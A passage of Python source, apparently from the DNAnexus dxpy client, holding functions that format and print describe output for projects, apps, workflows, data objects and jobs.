                    break_long_words=False)
               for key, value in job_output.items()]
    return prefix + title + (prefix + ' ' * title_len).join(entries)


def get_io_field(io_hash, defaults=None, delim='=', highlight_fields=()):
    """Format an input/output hash (plus optional defaults) for display.

    :param io_hash: mapping of field name -> value, or None
    :param defaults: mapping of default field name -> value; each entry is
        rendered wrapped in square brackets after the explicit entries
    :param delim: separator printed between each key and its value
    :param highlight_fields: keys whose values get yellow ANSI highlighting
    :returns: '-' when there is nothing to show, otherwise a newline-joined,
        aligned listing of all entries
    """

    def highlight_value(key, value):
        # Wrap the value in yellow when the caller asked to highlight the key.
        if key in highlight_fields:
            return YELLOW() + value + ENDC()
        else:
            return value

    if defaults is None:
        defaults = {}
    if io_hash is None:
        return '-'
    if len(io_hash) == 0 and len(defaults) == 0:
        return '-'
    if get_delimiter() is not None:
        return ('\n' + get_delimiter()).join([(key + delim + highlight_value(key, io_val_to_str(value))) for key, value in io_hash.items()] +
                                             [('[' + key + delim + io_val_to_str(value) + ']') for key, value in defaults.items()])
    else:
        lines = [fill(key + ' ' + delim + ' ' + highlight_value(key, io_val_to_str(value)),
                      initial_indent=' ' * FIELD_NAME_WIDTH,
                      subsequent_indent=' ' * (FIELD_NAME_WIDTH + 1),
                      break_long_words=False)
                 for key, value in io_hash.items()]
        lines.extend([fill('[' + key + ' ' + delim + ' ' + io_val_to_str(value) + ']',
                           initial_indent=' ' * FIELD_NAME_WIDTH,
                           subsequent_indent=' ' * (FIELD_NAME_WIDTH + 1),
                           break_long_words=False)
                      for key, value in defaults.items()])
        # Every line was built with FIELD_NAME_WIDTH leading spaces; slicing
        # strips that indent from the first line only, since the field label
        # printed by the caller occupies that space.
        return '\n'.join(lines)[FIELD_NAME_WIDTH:]

def get_resolved_jbors(resolved_thing, orig_thing, resolved_jbors):
    """Recursively collect resolved values of job-based object references.

    Walks ``orig_thing`` alongside its resolved counterpart and, for every
    JBOR found, records {jbor string: resolved value} into ``resolved_jbors``
    (mutated in place). Best-effort: failures to describe a job are ignored.
    """
    if resolved_thing == orig_thing:
        # Nothing was resolved along this branch.
        return
    if is_job_ref(orig_thing):
        jbor_str = jbor_to_str(orig_thing)
        if jbor_str not in resolved_jbors:
            try:
                from dxpy.api import job_describe
                job_output = job_describe(get_job_from_jbor(orig_thing)).get('output')
                if job_output is not None:
                    field_value = job_output.get(get_field_from_jbor(orig_thing))
                    jbor_index = get_index_from_jbor(orig_thing)
                    if jbor_index is not None:
                        if isinstance(field_value, list):
                            resolved_jbors[jbor_str] = field_value[jbor_index]
                    else:
                        resolved_jbors[jbor_str] = field_value
            except Exception:
                # Just don't report any resolved JBORs if there are any
                # problems. (Narrowed from a bare `except:`, which would also
                # swallow KeyboardInterrupt and SystemExit.)
                pass
    elif isinstance(orig_thing, list):
        for i in range(len(orig_thing)):
            get_resolved_jbors(resolved_thing[i], orig_thing[i], resolved_jbors)
    elif isinstance(orig_thing, dict) and '$dnanexus_link' not in orig_thing:
        for key in orig_thing:
            get_resolved_jbors(resolved_thing[key], orig_thing[key], resolved_jbors)

def render_bundleddepends(thing):
    """Return display strings for a list of bundledDepends entries.

    For each dependency, prefer "name (record-id)" of the asset record that
    produced the bundle (looked up via the file's "AssetBundle" property);
    fall back to the raw file name/ID when no asset record exists or it
    cannot be described.
    """
    # (Removed an unused local import of find_one_data_object.)
    from ..exceptions import DXError
    bundles = []
    for item in thing:
        file_id = item["id"]["$dnanexus_link"]
        # The AssetBundle property links a bundle file back to its asset record.
        bundle_asset_record = dxpy.DXFile(file_id).get_properties().get("AssetBundle")
        asset = None

        if bundle_asset_record:
            asset = dxpy.DXRecord(bundle_asset_record)

        if asset:
            try:
                bundles.append(asset.describe().get("name") + " (" + asset.get_id() + ")")
            except DXError:
                # Asset record is inaccessible; fall back to the file itself.
                asset = None

        if not asset:
            bundles.append(item["name"] + " (" + file_id + ")")

    return bundles

def render_execdepends(thing):
    """Return "manager: name [= version]" display strings for execDepends."""
    rendered = []
    for entry in thing:
        info = copy.copy(entry)
        # Dependencies default to the apt package manager.
        manager = info.setdefault('package_manager', 'apt')
        version_suffix = ' = ' + info['version'] if 'version' in info else ''
        rendered.append('%s: %s%s' % (manager, info['name'], version_suffix))
    return rendered

def render_stage(title, stage, as_stage_of=None):
    """Print the labeled fields describing one workflow stage.

    :param title: label for the stage's first line (e.g. "Stage 0")
    :param stage: stage describe hash
    :param as_stage_of: analysis ID; when the stage's execution belongs to a
        different parent analysis, it is shown as a cached result
    """
    rows = []

    if stage['name'] is not None:
        rows.append((title, "{name} ({id})".format(name=stage['name'], id=stage['id'])))
    else:
        rows.append((title, stage['id']))

    inaccessible_note = ""
    if stage.get('accessible') is False:
        inaccessible_note = " (" + RED() + "inaccessible" + ENDC() + ")"
    rows.append(('  Executable', stage['executable'] + inaccessible_note))

    if 'execution' in stage:
        execution = stage['execution']
        # An execution reused from another analysis is a cached result.
        cached = (as_stage_of is not None and
                  'parentAnalysis' in execution and
                  execution['parentAnalysis'] != as_stage_of)
        execution_id_str = execution['id']
        if cached:
            execution_id_str = "[" + execution_id_str + "]"

        if 'state' in execution:
            rows.append(('  Execution', execution_id_str + ' (' + JOB_STATES(execution['state']) + ')'))
        else:
            rows.append(('  Execution', execution_id_str))

        if cached:
            rows.append(('  Cached from', execution['parentAnalysis']))

    for label, value in rows:
        print_field(label, value)

def render_short_timestamp(timestamp):
    """Render a millisecond timestamp as a short local date-time string."""
    seconds = timestamp // 1000
    return str(datetime.datetime.fromtimestamp(seconds))

def render_timestamp(timestamp):
    """Render a millisecond timestamp in ctime() form (local time)."""
    seconds = timestamp // 1000
    return datetime.datetime.fromtimestamp(seconds).ctime()


# Column width (in characters) reserved for field labels by the print_*
# helpers below.
FIELD_NAME_WIDTH = 22


def print_field(label, value):
    """Write "label value" to stdout, label padded to FIELD_NAME_WIDTH and
    the value line-wrapped with a matching hanging indent."""
    delim = get_delimiter()
    if delim is not None:
        sys.stdout.write(label + delim + value + '\n')
        return
    padding = " " * (FIELD_NAME_WIDTH - len(label))
    wrapped = fill(value,
                   subsequent_indent=' ' * FIELD_NAME_WIDTH,
                   width_adjustment=-FIELD_NAME_WIDTH)
    sys.stdout.write(label + padding + wrapped + '\n')


def print_nofill_field(label, value):
    """Write an aligned field without line-wrapping the value."""
    padding = DELIMITER(" " * (FIELD_NAME_WIDTH - len(label)))
    sys.stdout.write(label + padding + value + '\n')


def print_list_field(label, values):
    """Print a list as a comma-separated field; '-' when the list is empty."""
    rendered = DELIMITER(', ').join(values) if values else '-'
    print_field(label, rendered)

def print_json_field(label, json_value):
    """Print a field whose value is rendered as JSON (non-ASCII preserved)."""
    rendered = json.dumps(json_value, ensure_ascii=False)
    print_field(label, rendered)


def print_project_desc(desc, verbose=False):
    """Print the describe output for a project or app container, one labeled
    field per line.

    :param desc: project/container describe hash
    :param verbose: if True, also show description, version, and pending
        transfers even when they would normally be suppressed
    """
    recognized_fields = [
        'id', 'class', 'name', 'summary', 'description', 'protected', 'restricted', 'created', 'modified',
        'dataUsage', 'sponsoredDataUsage', 'tags', 'level', 'folders', 'objects', 'permissions', 'properties',
        'appCaches', 'billTo', 'version', 'createdBy', 'totalSponsoredEgressBytes', 'consumedSponsoredEgressBytes',
        'containsPHI', 'databaseUIViewOnly', 'region', 'storageCost', 'pendingTransfer', 'atSpendingLimit',
        # Following are app container-specific
        'destroyAt', 'project', 'type', 'app', 'appName'
    ]

    # Basic metadata
    print_field("ID", desc["id"])
    print_field("Class", desc["class"])
    if "name" in desc:
        print_field("Name", desc["name"])
    if 'summary' in desc:
        print_field("Summary", desc["summary"])
    if 'description' in desc and (verbose or 'summary' not in desc):
        print_field("Description", desc['description'])
    if 'version' in desc and verbose:
        print_field("Version", str(desc['version']))

    # Ownership and permissions
    if 'billTo' in desc:
        # Strip the "user-" prefix for display.
        print_field("Billed to", desc['billTo'][5 if desc['billTo'].startswith('user-') else 0:])
    if 'pendingTransfer' in desc and (verbose or desc['pendingTransfer'] is not None):
        print_json_field('Pending transfer to', desc['pendingTransfer'])
    if "level" in desc:
        print_field("Access level", desc["level"])
    if 'region' in desc:
        print_field('Region', desc['region'])

    # Project settings
    if 'protected' in desc:
        print_json_field("Protected", desc["protected"])
    if 'restricted' in desc:
        print_json_field("Restricted", desc["restricted"])
    if 'containsPHI' in desc:
        print_json_field('Contains PHI', desc['containsPHI'])
    if 'databaseUIViewOnly' in desc and desc['databaseUIViewOnly']:
        print_json_field('Database UI View Only', desc['databaseUIViewOnly'])

    # Usage
    print_field("Created", render_timestamp(desc['created']))
    if 'createdBy' in desc:
        print_field("Created by", desc['createdBy']['user'][desc['createdBy']['user'].find('-') + 1:])
    print_field("Last modified", render_timestamp(desc['modified']))
    print_field("Data usage", ('%.2f' % desc["dataUsage"]) + ' GB')
    if 'sponsoredDataUsage' in desc:
        print_field("Sponsored data", ('%.2f' % desc["sponsoredDataUsage"]) + ' GB')
    if 'storageCost' in desc:
        print_field("Storage cost", "$%.3f/month" % desc["storageCost"])
    if 'totalSponsoredEgressBytes' in desc or 'consumedSponsoredEgressBytes' in desc:
        # 1073741824 = 2**30 bytes per GB.
        total_egress_str = '%.2f GB' % (desc['totalSponsoredEgressBytes'] / 1073741824.,) \
                           if 'totalSponsoredEgressBytes' in desc else '??'
        consumed_egress_str = '%.2f GB' % (desc['consumedSponsoredEgressBytes'] / 1073741824.,) \
                              if 'consumedSponsoredEgressBytes' in desc else '??'
        print_field('Sponsored egress',
                    ('%s used of %s total' % (consumed_egress_str, total_egress_str)))
    if 'atSpendingLimit' in desc:
        print_json_field("At spending limit?", desc['atSpendingLimit'])

    # Misc metadata
    if "objects" in desc:
        print_field("# Files", str(desc["objects"]))
    if "folders" in desc:
        print_list_field("Folders", desc["folders"])
    if "permissions" in desc:
        print_list_field(
            "Permissions",
            [key[5 if key.startswith('user-') else 0:] + ':' + value for key, value in desc["permissions"].items()]
        )
    if 'tags' in desc:
        print_list_field("Tags", desc["tags"])
    if "properties" in desc:
        print_list_field("Properties", [key + '=' + value for key, value in desc["properties"].items()])

    if "appCaches" in desc:
        print_json_field("App caches", desc["appCaches"])

    # Container-specific
    if 'type' in desc:
        print_field("Container type", desc["type"])
    if 'project' in desc:
        print_field("Associated project", desc["project"])
    if 'destroyAt' in desc:
        # BUGFIX: previously rendered desc['modified'] here instead of the
        # container's actual destruction time.
        print_field("To be destroyed", render_timestamp(desc['destroyAt']))
    if 'app' in desc:
        print_field("Associated App ID", desc["app"])
    if 'appName' in desc:
        print_field("Associated App", desc["appName"])

    # Echo any fields this renderer does not know about.
    for field in desc:
        if field not in recognized_fields:
            print_json_field(field, desc[field])

def get_advanced_inputs(desc, verbose):
    """Return the list of advanced input names to hide (empty when verbose)."""
    if verbose:
        return []
    details = desc.get("details")
    if isinstance(details, dict):
        return details.get("advancedInputs", [])
    return []

def print_app_desc(desc, verbose=False):
    """Print the describe output for an app, one labeled field per line.

    :param desc: app describe hash
    :param verbose: if True, also show advanced inputs in the input spec
    """
    recognized_fields = ['id', 'class', 'name', 'version', 'aliases', 'createdBy', 'created', 'modified', 'deleted', 'published', 'title', 'subtitle', 'description', 'categories', 'access', 'dxapi', 'inputSpec', 'outputSpec', 'runSpec', 'resources', 'billTo', 'installed', 'openSource', 'summary', 'applet', 'installs', 'billing', 'details', 'developerNotes',
                         'authorizedUsers']
    print_field("ID", desc["id"])
    print_field("Class", desc["class"])
    if 'billTo' in desc:
        # Strip the "user-" prefix for display.
        print_field("Billed to", desc['billTo'][5 if desc['billTo'].startswith('user-') else 0:])
    print_field("Name", desc["name"])
    print_field("Version", desc["version"])
    print_list_field("Aliases", desc["aliases"])
    print_field("Created by", desc["createdBy"][5 if desc['createdBy'].startswith('user-') else 0:])
    print_field("Created", render_timestamp(desc['created']))
    print_field("Last modified", render_timestamp(desc['modified']))
    print_field("Created from", desc["applet"])
    print_json_field('Installed', desc['installed'])
    print_json_field('Open source', desc['openSource'])
    print_json_field('Deleted', desc['deleted'])
    if not desc['deleted']:
        advanced_inputs = []
        details = desc["details"]
        if isinstance(details, dict) and "advancedInputs" in details:
            # Hide advanced inputs unless verbose; the marker key is removed
            # so it is not echoed along with the details themselves.
            if not verbose:
                advanced_inputs = details["advancedInputs"]
            del details["advancedInputs"]

        if 'published' not in desc or desc["published"] < 0:
            print_field("Published", "-")
        else:
            print_field("Published", render_timestamp(desc['published']))
        if "title" in desc and desc['title'] is not None:
            print_field("Title", desc["title"])
        if "subtitle" in desc and desc['subtitle'] is not None:
            print_field("Subtitle", desc["subtitle"])
        if 'summary' in desc and desc['summary'] is not None:
            print_field("Summary", desc['summary'])
        print_list_field("Categories", desc["categories"])
        if 'details' in desc:
            print_json_field("Details", desc["details"])
        print_json_field("Access", desc["access"])
        print_field("API version", desc["dxapi"])
        if 'inputSpec' in desc:
            print_nofill_field("Input Spec", get_io_spec(desc["inputSpec"], skip_fields=advanced_inputs))
            print_nofill_field("Output Spec", get_io_spec(desc["outputSpec"]))
            print_field("Interpreter", desc["runSpec"]["interpreter"])
            if "resources" in desc["runSpec"]:
                print_json_field("Resources", desc["runSpec"]["resources"])
            if "bundledDepends" in desc["runSpec"]:
                print_list_field("bundledDepends", render_bundleddepends(desc["runSpec"]["bundledDepends"]))
            if "execDepends" in desc["runSpec"]:
                print_list_field("execDepends", render_execdepends(desc["runSpec"]["execDepends"]))
            if "systemRequirements" in desc['runSpec']:
                print_json_field('Sys Requirements', desc['runSpec']['systemRequirements'])
        if 'resources' in desc:
            print_field("Resources", desc['resources'])
    if 'installs' in desc:
        print_field('# Installs', str(desc['installs']))
    if 'authorizedUsers' in desc:
        print_list_field('AuthorizedUsers', desc["authorizedUsers"])

    # Echo any fields this renderer does not know about.
    for field in desc:
        if field not in recognized_fields:
            print_json_field(field, desc[field])

def print_globalworkflow_desc(desc, verbose=False):
    """Print the describe output for a global workflow, one labeled field per
    line, including the underlying workflow's specs for the current region.

    :param desc: global workflow describe hash
    :param verbose: if True, also show advanced inputs in the input spec
    """
    recognized_fields = ['id', 'class', 'name', 'version', 'aliases', 'createdBy', 'created',
                         'modified', 'deleted', 'published', 'title', 'description',
                         'categories', 'dxapi', 'billTo', 'summary', 'billing', 'developerNotes',
                         'authorizedUsers', 'regionalOptions']
    is_locked_workflow = False
    print_field("ID", desc["id"])
    print_field("Class", desc["class"])
    if 'billTo' in desc:
        # Strip the "user-" prefix for display.
        print_field("Billed to", desc['billTo'][5 if desc['billTo'].startswith('user-') else 0:])
    print_field("Name", desc["name"])
    print_field("Version", desc["version"])
    print_list_field("Aliases", desc["aliases"])
    print_field("Created by", desc["createdBy"][5 if desc['createdBy'].startswith('user-') else 0:])
    print_field("Created", render_timestamp(desc['created']))
    print_field("Last modified", render_timestamp(desc['modified']))
    # print_json_field('Open source', desc['openSource'])
    print_json_field('Deleted', desc.get('deleted', False))
    if not desc.get('deleted', False):
        if 'published' not in desc or desc["published"] < 0:
            print_field("Published", "-")
        else:
            print_field("Published", render_timestamp(desc['published']))
        if "title" in desc and desc['title'] is not None:
            print_field("Title", desc["title"])
        if "subtitle" in desc and desc['subtitle'] is not None:
            print_field("Subtitle", desc["subtitle"])
        if 'summary' in desc and desc['summary'] is not None:
            print_field("Summary", desc['summary'])
        print_list_field("Categories", desc["categories"])
        if 'details' in desc:
            print_json_field("Details", desc["details"])
        print_field("API version", desc["dxapi"])

        # Additionally, print inputs, outputs, stages of the underlying workflow
        # from the region of the current workspace
        current_project = dxpy.WORKSPACE_ID
        if current_project:
            region = dxpy.api.project_describe(current_project, input_params={"fields": {"region": True}})["region"]
            if region and region in desc['regionalOptions']:
                workflow_desc = desc['regionalOptions'][region]['workflowDescribe']
                print_field("Workflow region", region)
                if 'id' in workflow_desc:
                    print_field("Workflow ID", workflow_desc['id'])
                # A workflow with explicit 'inputs'/'outputs' is locked; its
                # spec fields are shown under the "Workflow ..." labels instead.
                if workflow_desc.get('inputSpec') is not None and workflow_desc.get('inputs') is None:
                    print_nofill_field("Input Spec", get_io_spec(workflow_desc['inputSpec'], skip_fields=get_advanced_inputs(workflow_desc, verbose)))
                if workflow_desc.get('outputSpec') is not None and workflow_desc.get('outputs') is None:
                    print_nofill_field("Output Spec", get_io_spec(workflow_desc['outputSpec']))
                if  workflow_desc.get('inputs') is not None:
                    is_locked_workflow = True
                    print_nofill_field("Workflow Inputs", get_io_spec(workflow_desc['inputs']))
                if  workflow_desc.get('outputs') is not None:
                    print_nofill_field("Workflow Outputs", get_io_spec(workflow_desc['outputs']))
                if 'stages' in workflow_desc:
                    for i, stage in enumerate(workflow_desc["stages"]):
                        render_stage("Stage " + str(i), stage)
    if 'authorizedUsers' in desc:
        print_list_field('AuthorizedUsers', desc["authorizedUsers"])

    if is_locked_workflow:
        print_locked_workflow_note()

    # Echo any fields this renderer does not know about.
    for field in desc:
        if field not in recognized_fields:
            print_json_field(field, desc[field])

def get_col_str(col_desc):
    """Render a column descriptor as "name (type)"."""
    pieces = [col_desc['name'], DELIMITER(" ("), col_desc['type'], DELIMITER(")")]
    return "".join(pieces)

def print_data_obj_desc(desc, verbose=False):
    """Pretty-print the describe hash of a data object (file, applet, workflow, ...).

    :param desc: describe output of a data object
    :type desc: dict
    :param verbose: if True, also print details, description, and advanced inputs
    :type verbose: bool
    """
    # Fields given dedicated formatting below; anything else falls through to
    # the generic per-field loop at the end of this function.
    recognized_fields = ['id', 'class', 'project', 'folder', 'name', 'properties', 'tags', 'types', 'hidden', 'details', 'links', 'created', 'modified', 'state', 'title', 'subtitle', 'description', 'inputSpec', 'outputSpec', 'runSpec', 'summary', 'dxapi', 'access', 'createdBy', 'summary', 'sponsored', 'developerNotes',
                         'stages', 'inputs', 'outputs', 'latestAnalysis', 'editVersion', 'outputFolder', 'initializedFrom', 'temporary']

    # Set to True below when the object is a locked workflow (has
    # workflow-level inputs); triggers an explanatory note at the end.
    is_locked_workflow = False
    print_field("ID", desc["id"])
    print_field("Class", desc["class"])
    if 'project' in desc:
        print_field("Project", desc['project'])
    if 'folder' in desc:
        print_field("Folder", desc["folder"])
    print_field("Name", desc["name"])
    if 'state' in desc:
        print_field("State", DATA_STATES(desc['state']))
    if 'hidden' in desc:
        print_field("Visibility", ("hidden" if desc["hidden"] else "visible"))
    if 'types' in desc:
        print_list_field("Types", desc['types'])
    if 'properties' in desc:
        print_list_field("Properties", ['='.join([k, v]) for k, v in desc['properties'].items()])
    if 'tags' in desc:
        print_list_field("Tags", desc['tags'])
    if verbose and 'details' in desc:
        print_json_field("Details", desc["details"])
    if 'links' in desc:
        print_list_field("Outgoing links", desc['links'])
    print_field("Created", render_timestamp(desc['created']))
    if 'createdBy' in desc:
        # Strip the "user-" prefix from the creator's ID.
        print_field("Created by", desc['createdBy']['user'][5:])
        if 'job' in desc["createdBy"]:
            print_field(" via the job", desc['createdBy']['job'])
            if verbose and 'executable' in desc['createdBy']:
                print_field(" running", desc['createdBy']['executable'])
    print_field("Last modified", render_timestamp(desc['modified']))
    if "editVersion" in desc:
        print_field("Edit Version", str(desc['editVersion']))
    if "title" in desc:
        print_field("Title", desc["title"])
    if "subtitle" in desc:
        print_field("Subtitle", desc["subtitle"])
    if 'summary' in desc:
        print_field("Summary", desc['summary'])
    if 'description' in desc and verbose:
        print_field("Description", desc["description"])
    if 'outputFolder' in desc:
        print_field("Output Folder", desc["outputFolder"] if desc["outputFolder"] is not None else "-")
    if 'access' in desc:
        print_json_field("Access", desc["access"])
    if 'dxapi' in desc:
        print_field("API version", desc["dxapi"])

    # In case of a workflow: do not display "Input/Output Specs" that show stages IO
    # when the workflow has workflow-level input/output fields defined.
    if desc.get('inputSpec') is not None and desc.get('inputs') is None:
        print_nofill_field("Input Spec", get_io_spec(desc['inputSpec'], skip_fields=get_advanced_inputs(desc, verbose)))
    if desc.get('outputSpec') is not None and desc.get('outputs') is None:
        print_nofill_field("Output Spec", get_io_spec(desc['outputSpec']))
    if  desc.get('inputs') is not None:
        is_locked_workflow = True
        print_nofill_field("Workflow Inputs", get_io_spec(desc['inputs']))
    if  desc.get('outputs') is not None:
        print_nofill_field("Workflow Outputs", get_io_spec(desc['outputs']))

    if 'runSpec' in desc:
        print_field("Interpreter", desc["runSpec"]["interpreter"])
        if "resources" in desc['runSpec']:
            print_json_field("Resources", desc["runSpec"]["resources"])
        if "bundledDepends" in desc["runSpec"]:
            print_list_field("bundledDepends", render_bundleddepends(desc["runSpec"]["bundledDepends"]))
        if "execDepends" in desc["runSpec"]:
            print_list_field("execDepends", render_execdepends(desc["runSpec"]["execDepends"]))
        if "systemRequirements" in desc['runSpec']:
            print_json_field('Sys Requirements', desc['runSpec']['systemRequirements'])
    if 'stages' in desc:
        for i, stage in enumerate(desc["stages"]):
            render_stage("Stage " + str(i), stage)
    if 'initializedFrom' in desc:
        print_field("initializedFrom", desc["initializedFrom"]["id"])
    if 'latestAnalysis' in desc and desc['latestAnalysis'] is not None:
        print_field("Last execution", desc["latestAnalysis"]["id"])
        print_field("  run at", render_timestamp(desc["latestAnalysis"]["created"]))
        print_field("  state", JOB_STATES(desc["latestAnalysis"]["state"]))

    # Print the remaining fields, prettifying the common class-specific ones.
    for field in desc:
        if field in recognized_fields:
            continue
        else:
            if field == "media":
                print_field("Media type", desc['media'])
            elif field == "size":
                if desc["class"] == "file":
                    sponsored_str = ""
                    if 'sponsored' in desc and desc['sponsored']:
                        sponsored_str = DELIMITER(", ") + "sponsored by DNAnexus"
                    print_field("Size", get_size_str(desc['size']) + sponsored_str)
                else:
                    print_field("Size", str(desc['size']))
            elif field == "length":
                print_field("Length", str(desc['length']))
            elif field == "columns":
                if len(desc['columns']) > 0:
                    # Align column descriptions under a 16-character label gutter.
                    coldescs = "Columns" + DELIMITER(" " *(16-len("Columns"))) + get_col_str(desc["columns"][0])
                    for column in desc["columns"][1:]:
                        coldescs += '\n' + DELIMITER(" "*16) + get_col_str(column)
                    print(coldescs)
                else:
                    print_list_field("Columns", desc['columns'])
            else: # Unhandled prettifying
                print_json_field(field, desc[field])

    if is_locked_workflow:
        print_locked_workflow_note()

def printable_ssh_host_key(ssh_host_key):
    """Return a short fingerprint of *ssh_host_key* produced by ``ssh-keygen -lf``.

    Falls back to the raw (stripped) key if ``ssh-keygen`` is unavailable or
    fails for any reason.

    :param ssh_host_key: SSH host public key text
    :type ssh_host_key: str
    :rtype: str
    """
    try:
        keygen = subprocess.Popen(["ssh-keygen", "-lf", "/dev/stdin"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
        if USING_PYTHON2:
            (stdout, _) = keygen.communicate(ssh_host_key)
        else:
            (stdout, _) = keygen.communicate(ssh_host_key.encode())
    except Exception:
        # Was a bare "except:", which also swallowed SystemExit and
        # KeyboardInterrupt; best-effort fallback is preserved, but those
        # control-flow exceptions now propagate.
        return ssh_host_key.strip()
    else:
        if not USING_PYTHON2:
            stdout = stdout.decode()
        return stdout.replace(" no comment", "").strip()


def print_execution_desc(desc):
    """Pretty-print the describe hash of an execution (job or analysis).

    :param desc: describe output of a job or analysis
    :type desc: dict
    """
    # Fields given dedicated formatting below; anything else is dumped as raw
    # JSON by the loop at the end of this function.
    recognized_fields = ['id', 'class', 'project', 'workspace', 'region',
                         'app', 'applet', 'executable', 'workflow',
                         'state',
                         'rootExecution', 'parentAnalysis', 'parentJob', 'originJob', 'analysis', 'stage',
                         'function', 'runInput', 'originalInput', 'input', 'output', 'folder', 'launchedBy', 'created',
                         'modified', 'failureReason', 'failureMessage', 'stdout', 'stderr', 'waitingOnChildren',
                         'dependsOn', 'resources', 'projectCache', 'details', 'tags', 'properties',
                         'name', 'instanceType', 'systemRequirements', 'executableName', 'failureFrom', 'billTo',
                         'startedRunning', 'stoppedRunning', 'stateTransitions',
                         'delayWorkspaceDestruction', 'stages', 'totalPrice', 'isFree', 'invoiceMetadata',
                         'priority', 'sshHostKey']

    print_field("ID", desc["id"])
    print_field("Class", desc["class"])
    if "name" in desc and desc['name'] is not None:
        print_field("Job name", desc['name'])
    if "executableName" in desc and desc['executableName'] is not None:
        print_field("Executable name", desc['executableName'])
    print_field("Project context", desc["project"])
    if 'region' in desc:
        print_field("Region", desc["region"])
    if 'billTo' in desc:
        # Strip the "user-" prefix only; org IDs are shown in full.
        print_field("Billed to",  desc['billTo'][5 if desc['billTo'].startswith('user-') else 0:])
    if 'workspace' in desc:
        print_field("Workspace", desc["workspace"])
    if 'projectCache' in desc:
        print_field('Cache workspace', desc['projectCache'])
        print_field('Resources', desc['resources'])
    # Identify the executable: app, global workflow, applet, or workflow.
    if "app" in desc:
        print_field("App", desc["app"])
    elif desc.get("executable", "").startswith("globalworkflow"):
        print_field("Workflow", desc["executable"])
    elif "applet" in desc:
        print_field("Applet", desc["applet"])
    elif "workflow" in desc:
        print_field("Workflow", desc["workflow"]["id"])
    if "instanceType" in desc and desc['instanceType'] is not None:
        print_field("Instance Type", desc["instanceType"])
    if "priority" in desc:
        print_field("Priority", desc["priority"])
    print_field("State", JOB_STATES(desc["state"]))
    if "rootExecution" in desc:
        print_field("Root execution", desc["rootExecution"])
    if "originJob" in desc:
        if desc["originJob"] is None:
            print_field("Origin job", "-")
        else:
            print_field("Origin job", desc["originJob"])
    if desc["parentJob"] is None:
        print_field("Parent job", "-")
    else:
        print_field("Parent job", desc["parentJob"])
    if "parentAnalysis" in desc:
        if desc["parentAnalysis"] is not None:
            print_field("Parent analysis", desc["parentAnalysis"])
    if "analysis" in desc and desc["analysis"] is not None:
        print_field("Analysis", desc["analysis"])
        print_field("Stage", desc["stage"])
    if "stages" in desc:
        # Pair each workflow stage definition with its corresponding
        # analysis-stage record so the execution can be rendered per stage.
        for i, (stage, analysis_stage) in enumerate(zip(desc["workflow"]["stages"], desc["stages"])):
            stage['execution'] = analysis_stage['execution']
            render_stage("Stage " + str(i), stage, as_stage_of=desc["id"])
    if "function" in desc:
        print_field("Function", desc["function"])
    if 'runInput' in desc:
        # Inputs not explicitly supplied at run time are shown as defaults.
        default_fields = {k: v for k, v in desc["originalInput"].items() if k not in desc["runInput"]}
        print_nofill_field("Input", get_io_field(desc["runInput"], defaults=default_fields))
    else:
        print_nofill_field("Input", get_io_field(desc["originalInput"]))
    # Collect job-based object references (JBORs) that were resolved to
    # concrete values between submission and execution.
    resolved_jbors = {}
    input_with_jbors = desc.get('runInput', desc['originalInput'])
    for k in desc["input"]:
        if k in input_with_jbors and desc["input"][k] != input_with_jbors[k]:
            get_resolved_jbors(desc["input"][k], input_with_jbors[k], resolved_jbors)
    if len(resolved_jbors) != 0:
        print_nofill_field("Resolved JBORs", get_io_field(resolved_jbors, delim=(GREEN() + '=>' + ENDC())))
    print_nofill_field("Output", get_io_field(desc["output"]))
    if 'folder' in desc:
        print_field('Output folder', desc['folder'])
    print_field("Launched by", desc["launchedBy"][5:])
    print_field("Created", render_timestamp(desc['created']))
    # Timestamps are in milliseconds; divide by 1000 for second-resolution deltas.
    if 'startedRunning' in desc:
        if 'stoppedRunning' in desc:
            print_field("Started running", render_timestamp(desc['startedRunning']))
        else:
            print_field("Started running", "{t} (running for {rt})".format(t=render_timestamp(desc['startedRunning']),
                rt=datetime.timedelta(seconds=int(time.time())-desc['startedRunning']//1000)))
    if 'stoppedRunning' in desc:
        print_field("Stopped running", "{t} (Runtime: {rt})".format(
            t=render_timestamp(desc['stoppedRunning']),
            rt=datetime.timedelta(seconds=(desc['stoppedRunning']-desc['startedRunning'])//1000)))
    if desc.get('class') == 'analysis' and 'stateTransitions' in desc and desc['stateTransitions']:
        # Display finishing time of the analysis if available
        if desc['stateTransitions'][-1]['newState'] in ['done', 'failed', 'terminated']:
            print_field("Finished", "{t} (Wall-clock time: {wt})".format(
                t=render_timestamp(desc['stateTransitions'][-1]['setAt']),
                wt=datetime.timedelta(seconds=(desc['stateTransitions'][-1]['setAt']-desc['created'])//1000)))
    print_field("Last modified", render_timestamp(desc['modified']))
    if 'waitingOnChildren' in desc:
        print_list_field('Pending subjobs', desc['waitingOnChildren'])
    if 'dependsOn' in desc:
        print_list_field('Depends on', desc['dependsOn'])
    if "failureReason" in desc:
        print_field("Failure reason", desc["failureReason"])
    if "failureMessage" in desc:
        print_field("Failure message", desc["failureMessage"])
    if "failureFrom" in desc and desc['failureFrom'] is not None and desc['failureFrom']['id'] != desc['id']:
        print_field("Failure is from", desc['failureFrom']['id'])
    if 'systemRequirements' in desc:
        print_json_field("Sys Requirements", desc['systemRequirements'])
    if "tags" in desc:
        print_list_field("Tags", desc["tags"])
    if "properties" in desc:
        print_list_field("Properties", [key + '=' + value for key, value in desc["properties"].items()])
    # If this execution was cloned (re-run) from another one, show what is
    # the same and what differs; differences are highlighted in yellow.
    if "details" in desc and "clonedFrom" in desc["details"]:
        cloned_hash = desc["details"]["clonedFrom"]
        if "id" in cloned_hash:
            print_field("Re-run of", cloned_hash["id"])
            print_field(" named", cloned_hash["name"])

            same_executable = cloned_hash["executable"] == desc.get("applet", desc.get("app", ""))
            print_field(" using", ("" if same_executable else YELLOW()) + \
                            cloned_hash["executable"] + \
                            (" (same)" if same_executable else ENDC()))
            same_project = cloned_hash["project"] == desc["project"]
            same_folder = cloned_hash["folder"] == desc["folder"] or not same_project
            print_field(" output folder", ("" if same_project else YELLOW()) + \
                            cloned_hash["project"] + \
                            ("" if same_project else ENDC()) + ":" + \
                            ("" if same_folder else YELLOW()) + \
                            cloned_hash["folder"] + \
                            (" (same)" if (same_project and same_folder) else "" if same_folder else ENDC()))
            different_inputs = []
            for item in cloned_hash["runInput"]:
                if cloned_hash["runInput"][item] != desc["runInput"][item]:
                    different_inputs.append(item)
            print_nofill_field(" input", get_io_field(cloned_hash["runInput"], highlight_fields=different_inputs))

            cloned_sys_reqs = cloned_hash.get("systemRequirements")
